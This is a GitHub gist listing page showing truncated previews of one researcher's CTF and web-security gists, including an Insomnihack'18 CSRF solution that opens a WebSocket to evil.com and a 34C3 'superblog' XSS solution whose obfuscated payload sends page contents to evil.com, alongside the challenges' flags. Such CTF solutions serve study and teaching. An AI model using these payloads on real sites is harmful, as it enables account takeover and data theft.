Pepe Vila cgvwzq

@cgvwzq
cgvwzq / source.js
Created Oct 5, 2019
nn9ed x-oracle-v0 source code
View source.js
const fs = require('fs');
const express = require('express');
const session = require('express-session')
const cookieParser = require('cookie-parser');
const { URL } = require('url');
const uuidv4 = require('uuid/v4');
const path = require('path');
const bot = require('./bot');
const crypto = require('crypto');
const mariadb = require('mariadb');
@cgvwzq
cgvwzq / js-lower-alpha-parent-dot.html
Last active May 24, 2019
Generate JS using only lowercase alphabet letters, parentheses and dots.
View js-lower-alpha-parent-dot.html
<style>
textarea {
width: 100%;
height: 30%;
}
</style>
<textarea id="input">alert('xss')</textarea>
<textarea id="output"></textarea>
<br>
<label>Length: </label><span id="numchars"></span>
@cgvwzq
cgvwzq / output.log
Created Aug 18, 2018
Recursive CSS attribute leakage
View output.log
[+] Server is listening on 5001
...pre-payoad:
...post-payoad:
...pre-payoad: d
...post-payoad: 3
...pre-payoad: d3
...post-payoad: d3
...pre-payoad: d3a
...post-payoad: 0d3
...pre-payoad: d3ad
@cgvwzq
cgvwzq / index.html
Created Feb 6, 2018
js md5 collision integrity check
View index.html
<!doctype html>
<meta charset=utf-8>
<script>
(function(){
let p = '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
@cgvwzq
cgvwzq / index.html
Last active Jan 26, 2018
insomnihack'18 - Cool Storage Service web challenge
View index.html
<body>
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
// change admin's email
<input type="text" name="email" value="wololo@coolmail.com">
<input type="text" name="csrf" value="">
<input type="text" name="change" value="Modify profile">
</form>
<iframe id="leakchar"></iframe>
<script>
const WS = "ws://evil.com:8000";
@cgvwzq
cgvwzq / solution.html
Created Dec 30, 2017
34c3 - superblog
View solution.html
XSS vector:
<link id=foo rel=import href=/flag(1|2)>
<script src="/feed?type=jsonp&cb=payload"></script>
<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u -->
<script>
document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`,
</script>
<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru -->